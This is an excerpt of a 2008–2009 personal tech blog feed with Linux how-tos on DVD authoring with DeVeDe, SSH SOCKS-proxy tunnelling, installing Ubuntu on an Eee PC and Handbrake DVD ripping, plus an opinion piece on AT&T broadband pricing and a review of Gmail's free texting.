U.S., as most DVD players here expect NTSC content. If you know differently
for yours though, or it can handle both, then don't worry about it. If
you do need to change to NTSC and you're adding a lot of video files,
you can make this the default on the home screen. From the add file
dialog screen, you can also choose what audio track you want to use (if
there are multiple), and you can add your own custom subtitle files
simply by clicking the add button next to the subtitle box and selecting
the sub file. There are also a number of very useful advanced settings
that you can mess around with if you feel so inclined&amp;nbsp; (default settings
have worked for me though). Before you finish, I would advise clicking
the Preview button as well. It will encode a sample of the video with
your settings and play it back so that you can preview what the DVD will
look like when finished, and to make sure everything is in sync (very
handy feature!).&amp;nbsp; Once you are satisfied with your settings, simply
click OK.&lt;/p&gt;
&lt;p&gt;Now, you need to configure your menu. For me, I really don't care what
the menu looks like, so I just leave the default in. However, I'm sure
there are many out there who don't share my thoughts, and would like to
customize away. If so, simply click the Menu Options button at the
bottom of the home screen.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-menu-devede.png"&gt;&lt;img alt="Menu Options - DeVeDe" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-menu-devede.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;From here, you can make pretty much any change you want to. Add music,
add a custom background, title the Menu, change the font, everything. I
won't go through this in depth, but you can play around with it and see
what happens! You can also preview the menu from here, so you can see
what it looks like as you're making it.&lt;/p&gt;
&lt;p&gt;You're almost done now! The last thing you need to check is under the
Advanced Options tab at the bottom. If you have a multicore CPU, I would
advise selecting the Use Optimizations For Multicore CPUs option. This
will greatly speed up your disc creation time. Once you've checked this,
go ahead and click Forward.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-final-disc-structure-devede.png"&gt;&lt;img alt="Final Disc Structure - DeVeDe" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-final-disc-structure-devede.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;You will now be prompted for where to save the ISO image of the DVD. An
ISO image, for those who don't know, is basically a bit-for-bit copy of
a DVD, and we will use it to actually burn our DVD.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-saveiso-devede.png"&gt;&lt;img alt="Save ISO - DeVeDe" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-saveiso-devede.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Once done, just click OK and go get a cup of coffee. It will be a little
while, as DeVeDe needs to encode your video into the proper format.&lt;/p&gt;
&lt;p&gt;After it finishes, get a DVD and insert it into your DVD burner. Open up
the folder where you saved the ISO, double click the file (right
click-&amp;gt;Disk Burner on Jaunty), and click Burn. Wait for it to finish,
and then you're done! Go plug it into any DVD player, and it should work
like any other disc.&lt;/p&gt;
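&lt;p&gt;If you prefer the terminal for burning, too, growisofs from the
dvd+rw-tools package can write the image directly (the ISO path and device
name below are placeholders for your own):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo apt-get install dvd+rw-tools
growisofs -dvd-compat -Z /dev/dvd=/path/to/your.iso
&lt;/pre&gt;
&lt;p&gt;The -dvd-compat flag closes the disc, which helps with compatibility on
picky standalone players.&lt;/p&gt;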
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-image-burning-setup.png"&gt;&lt;img alt="Image Burning" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-image-burning-setup.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;And that's it! I hope this was helpful to some of you out there
wondering how to create DVDs in Ubuntu, feel free to ask if you need
help or clarification.&lt;/p&gt;
</summary><category term="devede"></category><category term="dvds"></category><category term="encoding"></category><category term="linux"></category><category term="ripping"></category><category term="Ubuntu"></category></entry><entry><title>The AT&amp;T Debacle - A Cautionary Tale</title><link href="https://spareclockcycles.org/2009/04/12/att-a-cautionary-tale.html" rel="alternate"></link><updated>2009-04-12T15:51:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2009-04-12:2009/04/12/att-a-cautionary-tale.html</id><summary type="html">&lt;p&gt;A few days ago, &lt;a class="reference external" href="http://gigaom.com/2009/04/09/time-warner-offers-more-pricing-options-to-sweeten-its-tiers/"&gt;AT&amp;amp;T announced the specifics on a trial of their new
pricing program&lt;/a&gt;, and, in true AT&amp;amp;T fashion, continued their rape of the
American consumer in another attempt to keep us in their profitable
technological dark age. I suppose that may be a little harsh, but hey, I
am not so happy right now. I'm sure you will forgive me my moment of
rage. So what is their new, creative pricing plan? Make you pay more (a
lot more, of course) to get the service you have today.&lt;/p&gt;
&lt;p&gt;Apparently, AT&amp;amp;T has decided that they are tired of giving people
&amp;quot;unlimited&amp;quot; broadband access (godless freeloaders), so they have
decided to start running trials in which users are charged by the
gigabyte for Internet access. What this essentially means is that
without any discernible increase in the cost of providing their service,
they have taken it upon themselves to greatly increase the cost of their
service to the average consumer. To get the same unlimited access that
you're paying 20-35 dollars a month for now, you will have to pay AT&amp;amp;T
(at least) 150 dollars a month in the future. Let me repeat that: AT&amp;amp;T
is implementing a 500% price hike for no apparent reason. Well, other
than greed, that is.&lt;/p&gt;
&lt;p&gt;Now, to be fair, AT&amp;amp;T has put forth a few arguments on why this price
hike is necessary. First and foremost among these arguments is that
people are actually using the bandwidth that they paid for. &lt;a class="reference external" href="http://arstechnica.com/old/content/2008/12/sorry-beaumont-att-brings-bandwidth-caps-to-texas.ars"&gt;And they
can't have that&lt;/a&gt;. They first tried to bump up their profit margins
again by trying to &lt;a class="reference external" href="http://www.pcworld.com/article/155076/google_bandwidth_hog.html?tk=rss_news"&gt;force web companies like Google and Yahoo to pay
more for all of their web traffic to be prioritized&lt;/a&gt;, a potentially
disastrous proposal for the internet as a whole, and a definitive death
blow to the cause of net neutrality. Unfortunately, a do-nothing
&lt;a class="reference external" href="http://www.vnunet.com/vnunet/news/2153682/rejects-net-neutrality-bill"&gt;Congress rejected the net neutrality bill that would have
prevented such a thing from taking place&lt;/a&gt;, though at least it
restrained itself from making the telecoms' brilliant idea law. Because
of this setback, AT&amp;amp;T and the other telecoms were forced to go back to
the drawing board. It looks like they've decided that if they can't take from
the provider side, they're going to take from the consumer. And they
want it all.&lt;/p&gt;
&lt;p&gt;The second most quoted reason for the price hike is much more sickening,
however. AT&amp;amp;T has gone around proudly declaring that they need the money
to keep pace with technological innovation, so as to continue to provide
their customers with &amp;quot;superior service.&amp;quot; Hrm...you mean like the &lt;a class="reference external" href="http://www.newnetworks.com/BroadbandScandalIntro.htm"&gt;$200
billion in taxpayer money you and your telecom buddies were
given back in the 90's to achieve the goal of 86 million U.S. homes with
symmetrical 45mbps internet connections by 2006?&lt;/a&gt; Or was that not quite
enough for you? While they've sat counting the money they robbed from
the American people, we have quickly slid from &lt;a class="reference external" href="http://www.websiteoptimization.com/bw/0704/"&gt;1st worldwide in
broadband penetration to 25th&lt;/a&gt;. And please, spare me the &amp;quot;we're too
large a country, Japan has it so easy&amp;quot; rhetoric. In case you didn't
realize, Japan is a country about the size of California, and I don't
think ANY Californians have yet been blessed with the 100mbit/s
internet connections that most Japanese citizens enjoy. Oh, and telecom
companies? &lt;a class="reference external" href="http://www.newnetworks.com/scandalquotes.htm"&gt;I'm still waiting for my $2000 refund check (or, preferably,
my faster internet connection)&lt;/a&gt;. And don't think I'll forget.&lt;/p&gt;
&lt;p&gt;Their third line of reasoning is just silly. AT&amp;amp;T argues that because it
worked in Europe (an arguable point) and on cell phones (a ridiculous
point), it should now be the rule rather than the exception. I can't
help but wonder how they decided that Europeans liked paying more for
their internet connections. My guess is that their definition of
&amp;quot;worked&amp;quot; is that people didn't storm their corporate offices with
pitchforks. Well, either that or the entire continent is comprised of
masochists. You can decide which is the more likely scenario. But
believe me, if I or any of my friends could have an unlimited 3G
connection that didn't cost an arm and a leg, we would subscribe in a
heartbeat. However, providers just will not do that, regardless of the
MASSIVE consumer interest in such a service. Why? They make more money
per kilobyte when they charge by the kilobyte than when they give people
an unlimited pass. It has nothing to do with need, or an increase in
traffic, or a better way of thinking about providing internet service
for consumers. It is about them padding their already enormous profits
with more of your hard earned money.&lt;/p&gt;
&lt;p&gt;I mentioned in the title of this post that this was a cautionary tale. I
want to clarify what I mean by that. First, I want to caution the
American people: if we continue to let the large corporations in this
country dictate the progress of technological innovation for their own
gain, we will fall further and further behind the rest of the world.
Technology, with all its benefits, has made this country the great place
that it is, and to let that slip away for the short-term profit of a
wealthy few would be one of the worst decisions that we could make. The
hard economic times that we are now in would devolve into something much
worse without our technological upper-hand. Second, I want to caution
the telecom companies, specifically AT&amp;amp;T: be careful on the ground on
which you tread. You've already been lucky so far that the U.S.
government has not taken action against you for your monopolistic
business practices now and your blatant fraud back in the 90's.&amp;nbsp; Price
gouging your customers to the point of ridiculousness while
simultaneously stealing their tax dollars is not going to win you any
friends. Eventually, your misdeeds and lies will come into the public
light (probably after you've pushed people's pocketbooks just a bit too
far), and people will be calling for heads to roll. When that happens,
you're going to need all the friends you can get.&lt;/p&gt;
&lt;p&gt;&amp;lt;/rant&amp;gt;&lt;/p&gt;
</summary><category term="at&amp;amp;t"></category><category term="internet"></category><category term="netneutrality"></category><category term="outrage"></category><category term="rant"></category><category term="telecoms"></category></entry><entry><title>SSH: Secure Browsing Via SOCKS Proxy</title><link href="https://spareclockcycles.org/2009/04/10/ssh-secure-browsing-via-socks-proxy.html" rel="alternate"></link><updated>2009-04-10T17:41:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2009-04-10:2009/04/10/ssh-secure-browsing-via-socks-proxy.html</id><summary type="html">&lt;p&gt;It seems that not a week goes by any more that I don't find some new,
fun trick to do with SSH. A few weeks ago, I found one that to me has
been especially useful.&lt;/p&gt;
&lt;p&gt;I was sitting in the Tulsa International Airport, once again wishing
that airports would just suck it up and provide free wireless access
throughout their terminals. It's a real pet peeve of mine, as layovers
become incredibly more painful when I can't waste away my time stumbling
about the internet. I might even have to do something *shudder*
productive...&lt;/p&gt;
&lt;p&gt;Anyway, there I was, sipping some coffee and working on a project, when
I noticed that there was an open wireless network available that was not
one of those god forsaken &lt;a class="reference external" href="http://www.airportwifiguide.com/for-free-airport-wifisee-this-boingoiphone-free-wifi-hack-for-laptop-users/"&gt;Boingo hotspots&lt;/a&gt;. Being the curious person
that I am, I decided to see if I could connect. Sure enough, it let me
right on. Being the cautious person I am, I went to an HTTPS secured
site to see what would happen. And sure enough, the normally valid
certificate was invalid, pretty much guaranteeing someone was trying to
listen in. I was still happy though; at least I still had internet
access and could keep myself mildly entertained with that.&lt;/p&gt;
&lt;p&gt;However, I was feeling especially curious that day, so I decided to try
to tunnel my traffic over SSH to a box back in my apartment, keeping my
oh-so-precious personal data away from prying eyes. Besides, it beats
working. After a little digging through man pages, this task, to my
surprise, turned out to be much simpler than I had expected. All you
need is one SSH command and an SSH server that you have access to and that
has forwarding enabled (the default OpenSSH installation on Ubuntu
does).&lt;/p&gt;
&lt;p&gt;If you don't have an SSH server set up and you're using Ubuntu at home,
simply execute this on your home machine:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo apt-get install openssh-server
&lt;/pre&gt;
&lt;p&gt;This will install and start the service. Make sure that a.) your user
password is of &lt;a class="reference external" href="http://www.passwordmeter.com/"&gt;decent strength&lt;/a&gt; (SSH is a common target for password
bruteforcing) and b.) that you have port 22 forwarded on your router if
you are behind a NAT so that you can access it from outside of your
local network. The SSH client should already be installed on a default
Ubuntu install (you can also &lt;a class="reference external" href="http://www.jonlee.ca/how-to-secure-your-traffic-using-an-ssh-tunnel-with-putty/"&gt;do this using PuTTY on windows&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;Once you have these two things ready, just open up terminal on your
laptop/netbook/mobile device and type the following:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
ssh -Nf -D randPortNum remote-username&amp;#64;ssh.server.com
&lt;/pre&gt;
&lt;p&gt;Replace randPortNum with a port number of your choosing (something above
1024 if you are not root, which is probable), remote-username with your
username on the remote system, and ssh.server.com with the hostname or
IP address of your SSH server. If you are using your home server, I'd
suggest using &lt;a class="reference external" href="http://www.dyndns.com/"&gt;DynDNS&lt;/a&gt; to get a simple domain name to access it with.
If you do not feel very comfortable with the command line, or you are
lazy like me (I hate having to close the window after I'm done...), you
can execute this command using Alt+F2, and the SSH client will prompt
you for your password.&lt;/p&gt;
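&lt;p&gt;If you find yourself doing this often, an entry in ~/.ssh/config can
save some typing (the Host alias and port below are just example names):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
Host proxyhome
    HostName ssh.server.com
    User remote-username
    DynamicForward 1080
&lt;/pre&gt;
&lt;p&gt;After that, ssh -Nf proxyhome does the same thing as the full command
above.&lt;/p&gt;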
&lt;p&gt;Now let me explain what exactly this command is doing. The f flag tells
SSH to fork into the background after authenticating, so that you can do
whatever you want after you execute it: close the terminal, keep using it
for something else, anything you please (just not killall ssh!). The N flag
tells SSH not to run a remote command at all, since all we want is the
forwarding. The D flag is the one doing the really interesting
stuff: the OpenSSH developers decided it would be cool to put SOCKS
proxy functionality straight into the client, and the D flag is how you
access it. Basically, you are just telling SSH to start &amp;quot;local dynamic
application-level port forwarding&amp;quot; (SOCKS proxy) from the specified port
on your local machine to the remote host. Now, any program on your
computer that supports SOCKS proxies will be able to connect to that
port on your machine and have its traffic automagically forwarded (and
encrypted!) across the internet to your remote machine, where it will
then go out to its destination.&lt;/p&gt;
&lt;p&gt;To add to it, tons of programs do support SOCKS proxies, more than you
might think. Firefox, Opera, Pidgin, Deluge, Transmission (Tracker
only), the list goes on. On top of that, using some programs (like
&lt;a class="reference external" href="http://tsocks.sourceforge.net/"&gt;tsocks&lt;/a&gt;) you can actually use any TCP based program over it. Very cool
stuff.&lt;/p&gt;
&lt;p&gt;To go ahead and encrypt your web traffic, open up Firefox (if you need
Opera instructions, they're probably very similar).&amp;nbsp; Go to
Edit-&amp;gt;Preferences-&amp;gt;Advanced-&amp;gt;Network-&amp;gt;Settings (Configure How Firefox
Connects To The Internet). Select &amp;quot;Manual proxy configuration&amp;quot;, enter
&amp;quot;localhost&amp;quot; for your SOCKS host and the port number you chose earlier as
your port. Either SOCKS 4 or 5 should work (I use 5). Now, it should
look similar to the picture below:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-connection-settings.png"&gt;&lt;img alt="An Example Configuration" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-connection-settings.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Now just click OK, close out the Settings dialog, and you're done! &lt;a class="reference external" href="http://checker.samair.ru/"&gt;Go
here&lt;/a&gt; and check it out: your IP is now the same as the remote host's.
If you're really paranoid, you can also make Firefox tunnel your DNS
queries over the proxy. This prevents the local network's nameserver
from feeding you bad DNS information or keeping tabs on what you are
viewing (you are still relying on the remote nameserver being
trustworthy though :P). To do this, open up a tab, enter the address
&amp;quot;&lt;a class="reference external" href="about:config"&gt;about:config&lt;/a&gt;&amp;quot;, search for &amp;quot;network.proxy.socks_remote_dns&amp;quot; and set it
to true. And that's it!&lt;/p&gt;
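&lt;p&gt;If you set this up on more than one machine, the same settings can live
in a user.js file in your Firefox profile directory. The preference names
below are the standard Firefox proxy preferences (1080 stands in for
whatever port you picked earlier; double-check in about:config if in
doubt):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
user_pref("network.proxy.type", 1);
user_pref("network.proxy.socks", "localhost");
user_pref("network.proxy.socks_port", 1080);
user_pref("network.proxy.socks_remote_dns", true);
&lt;/pre&gt;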
&lt;p&gt;This trick can be immensely useful in many situations, from securing
your traffic across untrusted local networks, to getting around packet
shaping/filtering, to remaining anonymous online. I now use it all the
time on my laptop, and very rarely trust the local network. A word of
warning before I sign off though: I was lucky on that hotspot because
the attacker was not trying to launch a MITM attack against my SSH
traffic. If they had, the keys would not have matched my previous
connection attempts to my SSH server, and I would have been warned in
big bold letters that I was being listened in on, and the SSH client
would have quit. In this situation, securing your traffic may be more
difficult, but not impossible. I may post later on how one might go
about this.&lt;/p&gt;
&lt;p&gt;Anyway, hope someone else finds this as useful and interesting as I do.
As always, feel free to ask if you have any questions.&lt;/p&gt;
&lt;p&gt;UPDATE 04/15/2010: I have done a &lt;a class="reference external" href="https://spareclockcycles.org/2010/04/15/socksify-anything/"&gt;follow-up post&lt;/a&gt; to this article
describing how you can use proxychains to allow any program that uses
TCP sockets to tunnel traffic over SOCKS proxies, not just ones that
have built-in proxy support. I also show how to chain multiple proxies
together.&lt;/p&gt;
</summary><category term="anonymity"></category><category term="firefox"></category><category term="socks"></category><category term="ssh"></category><category term="Ubuntu"></category></entry><entry><title>Ubuntu 8.10 on the Eee PC 1000</title><link href="https://spareclockcycles.org/2009/04/10/ubuntu-810-on-the-eee-pc-1000.html" rel="alternate"></link><updated>2009-04-10T03:42:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2009-04-10:2009/04/10/ubuntu-810-on-the-eee-pc-1000.html</id><summary type="html">&lt;p&gt;Wow, you know you haven't posted in awhile when your intro paragraph to
your next post talks about how Christmas went. In case anyone still
cares now that it's almost Easter, it went well. Very well. I still want
to take this time to thank Santa for his enormous generosity this past
year, as he was kind enough to get me that netbook that had been dancing
around in my dreams for a while: the Eee PC 1000.&lt;/p&gt;
&lt;p&gt;I've spent the past few months playing around with my shiny new Eee PC,
and I am duly impressed. Wireless N, 8GB SSD + 32GB built-in flash, 7
(yes, count them, 7) hours of battery life, Bluetooth, webcam + mic, the
list goes on and on. All of this technological goodness kept within a
sleek, 12 inch wide frame that even Steve Jobs might not deem &amp;quot;junk&amp;quot;.
Oh, and did I mention that all of this wonderful hardware has native
Linux driver support? Can you say &amp;quot;portable hackstation&amp;quot;?&lt;/p&gt;
&lt;p&gt;Yes, it was a good Christmas for this Linux user, and judging from the
experience I had with the Eee PC 1000, it's been a good year for Linux
users in general. With netbooks being the fastest growing segment in
the computing arena, Linux's superior memory and power management,
combined with its endless configurability and ever-improving
usability, is starting to make Microsoft fear the penguin more than
usual. This is not without reason: Ubuntu 8.10 has completed my netbook.&lt;/p&gt;
&lt;p&gt;Now, before you all cry out in unison that I can get netbooks with Linux
preinstalled, I know. In fact, mine came that way. However, the
distribution that shipped with my Eee PC made it feel less like a
computer and more like a toy, and a very useless one at that. I really
hope that Asus wises up and starts shipping something that isn't
intentionally crippled for some misguided notion of usability. I am
thoroughly convinced that an install of Ubuntu would have been easier to
use for anyone than that worthless POS that came preinstalled.&lt;/p&gt;
&lt;p&gt;However, as great a fit as the Ubuntu/Eee PC union is, it was not
without some small hurdles to first overcome. The following is a short
documentation of how to take your nifty new Eee PC and install the
latest release of Ubuntu, Intrepid Ibex.&lt;/p&gt;
&lt;p&gt;As I'm sure you've figured out, installing from CD isn't going to work
so well without a CD drive, so we first need to find another way to get
Ubuntu onto the netbook. The easiest way to do this is with a flash
drive. There are many ways to get Ubuntu on a flash drive, as documented
&lt;a class="reference external" href="https://help.ubuntu.com/community/Installation/FromUSBStick"&gt;here&lt;/a&gt;, but I will only be covering how I did it, using the
installation tool built into Ubuntu. If you don't have a flash drive,
well, buy one. Seriously, it's like 5 bucks.&lt;/p&gt;
&lt;p&gt;Once you've gotten a hold of a flash drive, make sure you've backed up
any important files, because we're going to wipe it and put Ubuntu onto
it. You are also going to need to get an ISO of the latest version of
Ubuntu, 8.10 (32-bit), from &lt;a class="reference external" href="http://www.ubuntu.com/getubuntu/download"&gt;here.&lt;/a&gt; While that's downloading, you might
run off and get an ethernet cable if you don't have one; you'll need it
later.&lt;/p&gt;
&lt;p&gt;It should be mentioned at this point that there are lots of ready-made
distros out there specifically for the Eee PC, including a number based
off of Ubuntu. In addition, a default installation of Ubuntu does not
have driver support enabled for all of the Eee PC components. However,
these ready-made distributions strip out a lot of kernel features that
you may need at some point, so for most users it's a better idea to just
install the standard edition and then add a custom kernel. After all, it
would be rather annoying if, for all the Eee PC's portable goodness, you
plugged in some device that normally works under a standard Ubuntu 8.10
install only to find out that support for it has been removed. It's
better to at least have a backup of the original kernel, with all of its
driver support, and then run a slimmed-down version with the Eee PC
drivers compiled in for day-to-day use. Now, I know what you're thinking
to yourself right now: &amp;quot;I have to replace my kernel just to get this
working? What is this, Gentoo?&amp;quot; Do not fear, the Ubuntu community has
your back, and has made this process a piece of cake.&lt;/p&gt;
&lt;p&gt;Now that you have the ISO downloaded, we can move on to the fun part -
installing it on a USB drive. If you already have Ubuntu installed on
your desktop/laptop, then you're all set to start. If not, you need to
burn the ISO to a CD, and then boot into it before you can start. Once
you have Ubuntu up and running, go to System -&amp;gt; Administration -&amp;gt; Create
A USB Startup Disk. This will look slightly different on the Live CD, as
you don't have to select an ISO (it uses itself), but the concept is the
same.&lt;/p&gt;
&lt;p&gt;Now, simply select the ISO file that you downloaded and the USB drive
you want to install it to, and click &amp;quot;Make Startup Disk&amp;quot;. Go get yourself
something to eat, as this can take awhile, depending on the speed of the
disk.&lt;/p&gt;
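&lt;p&gt;One optional step I'd suggest before writing the stick: verify the
ISO's checksum, so a corrupted download doesn't turn into a mysterious
boot failure later. The file names below are assumptions; grab the
MD5SUMS file from the same mirror you downloaded the ISO from.&lt;/p&gt;
&lt;pre class="literal-block"&gt;
# Print the ISO's MD5 and compare it by eye against the MD5SUMS file,
# or let md5sum do the comparison for you:
md5sum ubuntu-8.10-desktop-i386.iso
md5sum -c MD5SUMS
&lt;/pre&gt;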
&lt;p&gt;You should now have a bootable USB drive with Ubuntu 8.10 installed,
congratulations! You're well on your way to having it up and running.
Now, go ahead and plug it into your Eee PC and power it up. You may need
to set the USB drive as the default boot device in the BIOS, so it's
best to check. F2 at the bootup screen does the trick. For some reason,
my Eee PC reports USB drives as hard drives, so I would check to make
sure that USB is first in the Hard Disk boot priority list.&lt;/p&gt;
&lt;p&gt;Once you've booted up into Ubuntu using the USB drive, simply install
Ubuntu as you normally would, by clicking the Install icon on the
desktop and following the prompts. Make sure that the 8GB partition is
the one your root partition is installed to; not doing so can result
in slow performance and possibly data loss later on.&lt;/p&gt;
&lt;p&gt;Restart, and you're almost done! Hook up your Eee PC to a wired
connection (your wireless most likely won't work), and follow &lt;a class="reference external" href="http://array.org/ubuntu/setup-intrepid.html"&gt;these
instructions&lt;/a&gt; to install the custom Eee kernel.&lt;/p&gt;
&lt;p&gt;That's it! I hope you all have found this informative, and I know you
will all enjoy Ubuntu on your Eee PC as much as I have.&lt;/p&gt;
&lt;p&gt;If you want some tips on configuring your Ubuntu install to deal with
the small screen, please see &lt;a class="reference external" href="https://help.ubuntu.com/community/EeePC/Using"&gt;the Ubuntu wiki&lt;/a&gt;. Its tips really helped
me, and I'm sure they will be of use to all of you as well.&lt;/p&gt;
</summary><category term="8.10"></category><category term="eeepc"></category><category term="intrepid"></category><category term="Ubuntu"></category></entry><entry><title>Compulsive Slashdot Reading</title><link href="https://spareclockcycles.org/2009/04/10/compulsive-slashdot-reading.html" rel="alternate"></link><updated>2009-04-10T01:52:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2009-04-10:2009/04/10/compulsive-slashdot-reading.html</id><summary type="html">&lt;p&gt;And they said it would never pay off...:P . But in all seriousness,
welcome to all who have now blindly stumbled upon my tiny blog in the
middle of the vast sea of cyberspace. Because of the copious amounts of
schoolwork and research I've had on my plate the past few months, I
haven't set nearly enough time aside to update this blog. This saddens
me greatly, so I'm going to begin a renewed effort to start posting my
musings concerning technology and such again, and hopefully some of you
might be able to glean a few pieces of advice and wisdom out of my
incessant babbling. Now for something to write about... I guess I'll
have to see what sets my fingers typing next.&lt;/p&gt;
&lt;p&gt;Until then, peace.&lt;/p&gt;
</summary></entry><entry><title>Google Releases Free Texting Feature</title><link href="https://spareclockcycles.org/2008/12/21/google-releases-free-texting-feature.html" rel="alternate"></link><updated>2008-12-21T01:27:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2008-12-21:2008/12/21/google-releases-free-texting-feature.html</id><summary type="html">&lt;p&gt;I have to say, I heard about this one coming a few weeks ago and I was
quite excited. And now it's here! Google didn't disappoint either.&lt;/p&gt;
&lt;p&gt;Google's texting service has pretty much everything I had hoped for,
delivered of course with their trademark simplicity. Text messages are
sent the same way as chats, simply find the person in your contacts list
and, if you have their number stored, select &amp;quot;Send SMS&amp;quot;. Then just type
your message, press enter, and off it goes.&lt;/p&gt;
&lt;p&gt;In my tests, the messages were all delivered promptly, with very little
delay. This is a very big plus, as many other free services are slower
than Han Solo post-carbonite. Replies also arrive promptly, making it a
great, cheap way to have text convos with your friends who have more of
a life than you do.&lt;/p&gt;
&lt;p&gt;Oh yeah, did I mention the replies? Google assigns anyone who uses their
service a unique number, meaning that your friends can reply to any free
texts you send, and the replies get sent straight to your inbox. I'm on
my computer almost as much as I'm away from it, so it is incredibly
convenient for me to be able to text friends/family from my browser.
And, for those few times that I'm not, the reply is saved like any other
email or chat message, waiting for me when I return from what was most
likely a bathroom trip.&lt;/p&gt;
&lt;p&gt;I've messed with a few free texting services in the past, but most of
those experiences consisted of me reading their TOS page and then
running away quickly. Enter Google. Their strategy to passively gather
information on me and serve me targeted ads in my inbox, while still
more than a little unnerving, is miles better than having someone
constantly spamming my phone with MMS pron.&lt;/p&gt;
&lt;p&gt;Altogether, this is a great new feature, and I really hope that Google
decides to run with it. For all of you wondering how to enable this
handy service, go to Settings -&amp;gt; Labs in Gmail, and simply enable Text
Messaging (SMS) in Chat. I hope everyone finds this as useful as I
have!&lt;/p&gt;
&lt;p&gt;N.B. I am not actually a Google marketing person, as much as I may sound
like one in this post. I was excited, give me a break :P&lt;/p&gt;
</summary><category term="awesome"></category><category term="gmail"></category><category term="Google"></category><category term="texting"></category></entry><entry><title>Handbrake 0.9.3 - DVD Ripping on Ubuntu</title><link href="https://spareclockcycles.org/2008/12/11/handbrake-for-dvd-ripping-on-ubuntu.html" rel="alternate"></link><updated>2008-12-11T01:50:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2008-12-11:2008/12/11/handbrake-for-dvd-ripping-on-ubuntu.html</id><summary type="html">&lt;p&gt;As most of my friends can attest, I am very big on making backups of my
DVDs, so much so that I rarely pull them out of their case except to
make rips of them. I tend to break/scratch discs like none other, so I
make it a point to have backups. I am very hard to please when it comes
to ripping programs, as I want both to be able to tweak advanced
settings to my liking and to be able to just throw something in and go.
Needless to say, I want the rips to be high quality. I generally
use x264 video and AC3 audio muxed into an MKV container, and I've found
this to be a very good combination. I have tried pretty much every tool
that I can find out there to do this for me: dvd::rip, OGMRip, and
acidrip to name a few, but have still always fallen back to using a
collection of custom CLI scripts that I put together to rip and encode
them automatically. I've even toyed around with the idea of creating my
own GUI, to attempt to fill a rather gaping void of decent ripping
programs, but unfortunately have not had the time.&lt;/p&gt;
&lt;p&gt;Thankfully, this will no longer be necessary. I have just tested the
latest &lt;a class="reference external" href="http://handbrake.fr/"&gt;Handbrake&lt;/a&gt; release for Linux, and I have to say, these guys
have outdone themselves. When I last tried Handbrake, it was simply a
CLI version on Linux, and a rather bad one at that. My direct mencoder
invocations consistently performed better than their command line
program's calls, which was reason enough to move on. Beyond that, it was
just hard to use, and if I was doing command line, I might as well just
use mencoder. Not so anymore with the release of their latest GUI. It's a
GTK frontend, which really does make encoding as simple as point and
click. Now Handbrake has long been a favorite on Windows, so this may
not come as a surprise to some, but I really was not expecting this kind
of release for Linux from them. Kudos.&lt;/p&gt;
&lt;p&gt;The following is a short tutorial on how to set up and use the new
Handbrake GUI on Ubuntu:&lt;/p&gt;
&lt;p&gt;Some people on the Ubuntu forums have thankfully set up a PPA
repository of Handbrake to make it easier to install. To install
Handbrake on Ubuntu, do the following:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
gksudo gedit /etc/apt/sources.list
&lt;/pre&gt;
&lt;p&gt;Now, you need to copy the lines below into it. If you are on Intrepid,
change &amp;quot;hardy&amp;quot; to &amp;quot;intrepid&amp;quot;.&lt;/p&gt;
&lt;pre class="literal-block"&gt;
deb http://ppa.launchpad.net/handbrake-ubuntu/ubuntu hardy main
deb-src http://ppa.launchpad.net/handbrake-ubuntu/ubuntu hardy main
&lt;/pre&gt;
&lt;p&gt;Once you're done, save and close. Now, reload your repositories and
install handbrake:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo apt-get update
sudo apt-get install handbrake-gtk
&lt;/pre&gt;
&lt;p&gt;Now Handbrake should be installed. If you're going to be ripping DVDs,
this tutorial assumes that you have libdvdcss installed. You can grab it
off of &lt;a class="reference external" href="https://help.ubuntu.com/community/Medibuntu"&gt;Medibuntu&lt;/a&gt; (help.ubuntu.com) if you don't. Go to the Sound and
Video tab in your menu, and select Handbrake. Alternately, you can just
type &amp;quot;ghb&amp;quot; into the command line to start up the GUI; starting it from a
terminal also makes it easier to see debug output if you run into
problems. Now you should see the following screen:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-1.png"&gt;&lt;img alt="Main Menu" src="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-1.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;As you can see, the GUI is laid out pretty simply. A number of pre-made
profiles are there for your convenience on the right side, with profiles
for everything from iPods to movies to Xbox 360s. To begin your rip,
insert a DVD. Click the Source button and just select the DVD drive that
you've put the disc into.&lt;/p&gt;
